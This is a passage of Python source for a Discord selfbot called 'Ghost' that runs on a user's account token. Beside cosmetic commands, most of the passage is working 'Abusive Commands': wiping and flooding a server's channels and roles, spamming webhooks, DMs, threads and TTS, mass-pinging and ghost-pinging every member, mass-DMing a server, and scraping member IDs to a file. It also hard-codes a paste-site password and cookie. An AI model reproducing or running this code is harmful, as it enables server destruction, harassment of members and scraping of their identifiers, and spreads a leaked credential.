embed = discord.Embed(title="Webhook Setup", description=f"Created a new guild for your webhooks called `{guild.name}`.", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Created a new guild for your webhooks called `{guild.name}`.", delete_after=__deletetimeout__)
@Ghost.command(name="spamwebhook", description="Spam the shit out of a webhook.", usage="spamwebhook [amount] [url] (message)")
async def spamwebhook(ctx, amount: int, url, *, message = None):
if __embedmode__:
embed = discord.Embed(title="Spamming webhook...", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Spamming webhook...", delete_after=__deletetimeout__)
if message is None:
for _ in range(amount):
spamMsg = ''.join(random.choice(string.ascii_letters) for i in range(2000))
webhook = DiscordWebhook(url=url, content=spamMsg)
webhook.execute()
else:
for _ in range(amount):
webhook = DiscordWebhook(url=url, content=message)
webhook.execute()
if __embedmode__:
embed = discord.Embed(title="Finished spamming webhook", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Finished spamming webhook!", delete_after=__deletetimeout__)
@Ghost.command(name="newwebhook", description="Create a webhook in the command channel.", usage="newwebhook [name]", aliases=["createwebhook"])
async def newwebhook(ctx, *, name):
webhook = await ctx.channel.create_webhook(name=name)
if __embedmode__:
embed = discord.Embed(title=f"Created a webhook called {name}", description=f"URL: {webhook.url}", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Created a webhook called {name}\nURL: {webhook.url}", delete_after=__deletetimeout__)
@Ghost.command(name="delwebhook", description="Delete a webhook from the ID.", usage="delwebhook [id]", aliases=["deletewebhook", "removewebhook"])
async def delwebhook(ctx, id: int):
webhook = await Ghost.fetch_webhook(id)
await webhook.delete()
if __embedmode__:
embed = discord.Embed(title="Deleted the webhook", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Deleted the webhook", delete_after=__deletetimeout__)
@Ghost.command(name="webhookinfo", description="Information about the webhook.", usage="webhookinfo [id]", aliases=["webhooklookup", "lookupwebhook"])
async def webhookinfo(ctx, id: int):
webhook = await Ghost.fetch_webhook(id)
if __embedmode__:
embed = discord.Embed(title=f"{webhook.name} Information", colour=__embedcolour__)
embed.add_field(name="Webhook Name", value=f"```{webhook.name}```", inline=False)
embed.add_field(name="Webhook ID", value=f"```{webhook.id}```", inline=False)
embed.add_field(name="Webhook Guild", value=f"```{webhook.guild.name}```", inline=False)
embed.add_field(name="Webhook Channel", value=f"```{webhook.channel.name}```", inline=False)
embed.add_field(name="Webhook Token", value=f"```{webhook.token}```", inline=False)
embed.set_thumbnail(url=webhook.avatar_url)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ {webhook.name} Information ]
Webhook Name: {webhook.name}
Webhook ID: {webhook.id}
Webhook Guild: {webhook.guild.name}
Webhook Channel: {webhook.channel.name}
Webhook Token: {webhook.token}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="dumpchat", description="Get the chat's history.", usage="dumpchat [amount] (channel id) (oldest first, true/false)", aliases=["savechat", "chathistory"])
async def dumpchat(ctx, amount: int, channelId: int = None, oldestFirst: bool = False):
if channelId is None:
messages = await ctx.channel.history(limit=amount, oldest_first=oldestFirst).flatten()
f = open("chat_history.txt", "a")
try:
f.write(f"Chat history for #{ctx.channel.name} in {ctx.guild.name}\nSaved a total of {len(messages)} messages.\n \n")
except:
f.write(f"Saved a total of {len(messages)} messages.\n \n")
for msg in messages:
try:
f.write(f"[{msg.created_at.strftime('%m/%d/%Y, %H:%M:%S')}] {msg.author.name}#{msg.author.discriminator}: {msg.content}\n")
except:
pass
f.close()
await ctx.send("Generated the chat history.", file=discord.File("chat_history.txt"))
os.remove("chat_history.txt")
else:
channel = Ghost.get_channel(channelId)
messages = await channel.history(limit=amount, oldest_first=oldestFirst).flatten()
f = open("chat_history.txt", "a")
try:
f.write(f"Chat history for #{channel.name} in {channel.guild.name}\nSaved a total of {len(messages)} messages.\n \n")
except:
f.write(f"Saved a total of {len(messages)} messages.\n \n")
for msg in messages:
try:
f.write(f"[{msg.created_at.strftime('%m/%d/%Y, %H:%M:%S')}] {msg.author.name}#{msg.author.discriminator}: {msg.content}\n")
except:
pass
f.close()
await ctx.send("Generated the chat history.", file=discord.File("chat_history.txt"))
os.remove("chat_history.txt")
@Ghost.command(name="newtheme", description="Create a new theme with the given name.", usage="newtheme [name]", aliases=["createtheme"])
async def newtheme(ctx, *, name):
if not os.path.isfile(f'themes/{name}.json'):
name = name.replace(" ", "-")
f = open(f'themes/{name}.json', "w")
f.write("""
{
"embedtitle": "Ghost Recoded",
"embedcolour": "#708ffa",
"embedfooter": "",
"embedfooterimage": "",
"globalemoji": ":ghost:",
"embedimage": ""
}
""")
f.close()
if __embedmode__:
embed = discord.Embed(title="Theme create with the name " + name, colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Theme create with the name {name} ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="A theme with that name already exists", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ A theme with that name already exists ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="deltheme", description="Delete the named theme.", usage="deltheme [name]", aliases=["deletetheme", "removetheme"])
async def deltheme(ctx, *, name):
if not os.path.isfile(f'themes/{name}.json'):
if __embedmode__:
embed = discord.Embed(title="A theme with that name doesnt exist", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ A theme with that name doesnt exist ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
os.remove(f'themes/{name}.json')
if __embedmode__:
embed = discord.Embed(title="Theme with the name " + name + " was deleted", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Theme with the name {name} was deleted ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="theme", description="Change your current theme.", usage="theme [theme]", aliases=["settheme"])
async def theme__(ctx, *, theme):
if os.path.isfile(f'themes/{theme}.json'):
updateTheme(theme + ".json")
Config.changeTheme(theme)
if __embedmode__:
embed = discord.Embed(title="That theme has been set", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ That theme has been set ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="A theme with that name doesnt exist", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ A theme with that name doesnt exist ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="prefix", description="Set the command prefix.", usage="prefix [prefix]", aliases=["c"])
async def prefix(ctx, *, prefix):
Config.changePrefix(prefix)
if __embedmode__:
embed = discord.Embed(title=f"Prefix changed to `{prefix}`", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Prefix changed to {prefix} ]
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="restart", description="Restart Ghost selfbot.", usage="restart", aliases=["reboot", "reload", "consoleCommand-restart"])
async def restart(ctx):
print_info("Restarting ghost...")
try:
await ctx.send("Restarting ghost...")
except:
pass
restart_bot()
@Ghost.command(name="firstmessage", description="Get the first message in the command channel.", usage="firstmessage", aliases=["firstmsg"])
async def firstmessage(ctx):
messages = await ctx.channel.history(limit=1, oldest_first=True).flatten()
for message in messages:
firstMessage = message
if __embedmode__:
embed = discord.Embed(title="First Message", description=f"{firstMessage.jump_url}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"First message: {firstMessage.jump_url}")
@Ghost.command(name="haste", description="Upload text to Ghost's Haste site.", usage="haste [text]")
async def haste(ctx, *, text):
url = "https://haste.ghost.cool/haste"
payload=f'password=h5MEn3ptby4XSdxJ&text={text}&username={ctx.author.name}'
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': '__cfduid=dffeb66149683e21f8e860ea28116dd7d1613823909'
}
response = requests.request("POST", url, headers=headers, data=payload)
await ctx.send(response.text)
@Ghost.command(name="brainfuck", description="Generate brainfuck code from text.", usage="brainfuck [text]", aliases=["bf"])
async def brainfuck(ctx, *, text):
result = brainfuckery.Brainfuckery().convert(text)
await ctx.send(result)
@Ghost.command(name="executebrainfuck", description="Execute brainfuck code.", usage="executebrainfuck [code]", aliases=["ebf"])
async def executebrainfuck(ctx, *, code):
result = brainfuckery.Brainfuckery().interpret(code)
await ctx.send(result)
@Ghost.command(name="shrug", description="Shrug your arms.", usage="shrug")
async def shrug(ctx):
await ctx.send(f"¯\_(ツ)_/¯")
@Ghost.command(name="tableflip", description="Flip the table.", usage="tableflip")
async def tableflip(ctx):
await ctx.send("(╯°□°)╯︵ ┻━┻")
@Ghost.command(name="unflip", description="Put the table back.", usage="unflip")
async def unflip(ctx):
await ctx.send("┬─┬ ノ( ゜-゜ノ)")
# @Ghost.command(name="hide", description="Hide a message behind another message.", usage="hide [msg1] [msg2]")
# async def hide(ctx, msg1, msg2):
# await ctx.send(msg1+hideText+msg2)
@Ghost.command(name="blank", description="Send a blank message", usage="blank", aliases=["empty"])
async def blank(ctx):
await ctx.send("** **")
@Ghost.command(name="length", description="Get the length of a string.", usage="length [string]", aliases=["stringlength"])
async def length(ctx, *, string):
await ctx.send(f"Length of `{string}`: " + len(string))
@Ghost.command(name="lmgtfy", description="Let me Google that for you.", usage="lmgtfy [search]", aliases=["letmegooglethatforyou"])
async def lmgtfy(ctx, *, search):
await ctx.send(f"https://lmgtfy.app/?q={search.replace(' ', '+')}")
@Ghost.command(name="selfbotcheck", description="Checks for users using a selfbot.", usage="selfbotcheck", aliases=["sbcheck"])
async def selfbotcheck(ctx):
await ctx.send("Checking for users with a trash selfbot...\nPeople who react below are using a selfbot.")
await ctx.send("GIVEAWAY")
await ctx.send("🎉 **GIVEAWAY** 🎉")
@Ghost.command(name="nukeserver", description="Delete all roles and channels in the command server.", usage="nukeserver", aliases=["nukeguild"])
async def nukeserver(ctx):
if __riskmode__:
if ctx.author.guild_permissions.administrator:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="destroyserver", description="Completely destroy the command server.", usage="destroyserver", aliases=["destroyguild"])
async def destroyserver(ctx):
if __riskmode__:
if ctx.author.guild_permissions.administrator:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
name = ''.join(random.choice(string.ascii_letters) for i in range(100))
await ctx.guild.edit(name=name)
for _ in range(500):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_text_channel(name=f'{name}')
await ctx.guild.create_role(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="spamchannels", description="Spam create channels with a desired name. (Thanks Port <3)", usage="spamchannels [amount] (name)", aliases=["spamcreatechannels"])
async def spamchannels(ctx, amount: int, *, name = None):
if __riskmode__:
if ctx.author.guild_permissions.manage_channels:
if name is None:
for _ in range(amount):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_text_channel(name=f'{name}')
else:
for _ in range(amount):
await ctx.guild.create_text_channel(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="spamroles", description="Spam create roles with a desired name.", usage="spamroles [amount] (name)", aliases=["spamcreateroles"])
async def spamroles(ctx, amount: int, *, name = None):
if __riskmode__:
if ctx.author.guild_permissions.manage_roles:
if name is None:
for _ in range(amount):
name = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(12, 18)))
await ctx.guild.create_role(name=f'{name}')
else:
for _ in range(amount):
await ctx.guild.create_role(name=f'{name}')
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="deletechannels", description="Delete all of the command server's channels.", usage="deletechannels", aliases=["delchannels", "removechannels"])
async def deletechannels(ctx):
if __riskmode__:
if ctx.author.guild_permissions.manage_channels:
for channel in ctx.guild.channels:
try:
await channel.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="deleteroles", description="Delete all of the command server's roles.", usage="deleteroles", aliases=["delroles", "removeroles"])
async def deleteroles(ctx):
if __riskmode__:
if ctx.author.guild_permissions.manage_roles:
for role in ctx.guild.roles:
try:
await role.delete()
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="dmspam", description="Spam DM messages X amount of times.", usage="dmspam [amount] [delay] [@user] [message]", aliases=["spamdm"])
async def dmspam(ctx, amount: int, delay: int, user: discord.User, *, message):
if __riskmode__:
for _ in range(amount):
try:
await user.send(message)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="threadspam", description="Spam create threads with a starting message.", usage="threadspam [delay] [amount] [addusers | true/false] [name] [startmessage]", aliases=["spamthreads", "spamcreatethreads"])
async def threadspam(ctx, delay: int, amount: int, addusers: bool, name: str = "Ghost best selfbot!", *, startmessage: str):
if __riskmode__:
users = []
try:
await ctx.message.delete()
except:
pass
def createThread(title, channel_id, start_message_id):
return requests.request("post", f"https://discord.com/api/channels/{channel_id}/messages/{start_message_id}/threads", headers={"Authorization": __token__, "Content-Type": "application/json"}, data=json.dumps({"name": title}))
def getUsers(guild, channel):
DiscumClient = discum.Client(token=__token__, user_agent=f"{get_random_user_agent()}")
@DiscumClient.gateway.command
def pingpingbrbr(resp):
guild_id = f'{guild.id}'
channel_id = f'{channel.id}'
if resp.event.ready_supplemental:
DiscumClient.gateway.fetchMembers(guild_id, channel_id, wait=1)
if DiscumClient.gateway.finishedMemberFetching(guild_id):
DiscumClient.gateway.removeCommand(pingpingbrbr)
DiscumClient.gateway.close()
DiscumClient.gateway.run()
members = []
for memberID in DiscumClient.gateway.session.guild(f'{guild.id}').members:
members.append(f"<@!{memberID}>")
return members
async def addUsers(users, channel_id):
try:
requests.post(f"https://discord.com/api/channels/{channel_id}/messages", headers={"Authorization": __token__, "Content-Type": "application/json"}, data=json.dumps({"content": ' '.join(users)}))
except:
pass
if addusers:
print_info("Fetching channel members...")
users = getUsers(ctx.guild, ctx.channel)
await asyncio.sleep(2)
print(users)
await asyncio.sleep(2)
index = 0
if not ctx.author.guild_permissions.administrator:
if amount > 5:
print_info("Limiting amount of threads to 5 to prevent rate limits.")
amount = 5
for _ in range(amount):
index += 1
try:
message = await ctx.send(startmessage + f" {index}")
createThredResponse = createThread(name, ctx.channel.id, message.id)
if addusers:
print_info("Adding users to the thread...")
await addUsers(users, createThredResponse.json()["id"])
print_info("Created a new thread.")
try:
await message.delete()
except:
pass
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="channelspam", description="Spam a message X amount of times in every channel.", usage="channelspam [amount] [delay] [message]", aliases=["sendall", "sendtoallchannels", "msgallchannels", "messageallchannels"])
async def channelspam(ctx, amount:int, *, message:str):
if __riskmode__:
for _ in range(amount):
for channel in ctx.guild.text_channels:
try:
await channel.send(message)
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="spam", description="Spam X amount of times.", usage="spam [amount] [delay] [message]")
async def spam(ctx, amount: int, delay: int, *, message):
if __riskmode__:
global spammingMessages
spammingMessages = True
async def spamMessages():
for _ in range(amount):
if spammingMessages == True:
await ctx.send(message)
await asyncio.sleep(delay)
else:
return
Ghost.loop.create_task(spamMessages())
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="stopspam", description="Stop spamming messages.", usage="stopspam")
async def stopspam(ctx):
if __riskmode__:
global spammingMessages
spammingMessages = False
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="ttsspam", description="Spam TTS messages X amount of times.", usage="ttsspam [amount] [delay] [message]", aliases=["texttospeachspam"])
async def ttsspam(ctx, amount: int, delay: int, *, message):
if __riskmode__:
for _ in range(amount):
await ctx.send(message, tts=True)
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="fetchmembers", description="Fetch members from a server.", usage="fetchmembers", aliases=["fetchmembersfromserver"])
async def fetchmembers(ctx):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
print_info("Fetching members from server...")
guild_id = ctx.guild.id
channel_id = ctx.channel.id
bot.gateway.fetchMembers(guild_id, channel_id, reset=False)
@bot.gateway.command
def memberTest(resp):
if bot.gateway.finishedMemberFetching(guild_id):
lenmembersfetched = len(bot.gateway.session.guild(guild_id).members)
print_info(str(lenmembersfetched)+' members fetched')
print_info("Fetch complete.")
bot.gateway.removeCommand(memberTest)
bot.gateway.close()
bot.gateway.run()
members = bot.gateway.session.guild(guild_id).members
open("data/members.txt", "w").write('\n'.join(members))
await ctx.send("See console.", delete_after=__deletetimeout__)
print_info("Fetched a total of " + str(len(members)) + " members.")
print_info("Saved a list of member IDs to data/members.txt.")
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="massghostping", description="Ping a mass amount of people in the command server and delete the messages.", usage="massghostping (amount of messages) (send delay)", aliases=["massghostmention", "theotherfunny"])
async def massghostping(ctx, amount:int=1, delay:int=0):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=0)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
# members = []
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
messages = []
message = ""
# for channel in ctx.guild.text_channels:
# print_info(f"Starting fetch in #{channel.name}.")
# members2 = get_members(str(ctx.guild.id), str(channel.id))
# for member in members2:
# members.append(member)
# print_info(f"Fetched a total of {len(members)} members.")
for member in members:
if len(message) < 1950:
message += f"<@{member}> "
else:
messages.append(message)
message = ""
messages.append(message)
for _ in range(amount):
for message in messages:
try:
await ctx.send(message, delete_after=0)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="massping", description="Ping a mass amount of people in the command server.", usage="massping (amount of messages) (send delay)", aliases=["massmention", "sigmainstaller", "hahafunny"])
async def massping(ctx, amount:int=1, delay:int=0):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=0)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
messages = []
message = ""
for member in members:
if len(message) < 1950:
message += f"<@{member}> "
else:
messages.append(message)
message = ""
messages.append(message)
for _ in range(amount):
for message in messages:
try:
await ctx.send(message)
await asyncio.sleep(delay)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="massdm", description="Send a DM message to everyone in the server.", usage="massdm [delay] [amount] [message]")
@commands.guild_only()
async def massdm(ctx, delay:int=0, amount:int=10, *, message:str):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for _ in range(amount):
for member in members:
try:
member = await Ghost.fetch_user(int(member))
await member.send(message)
except:
pass
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
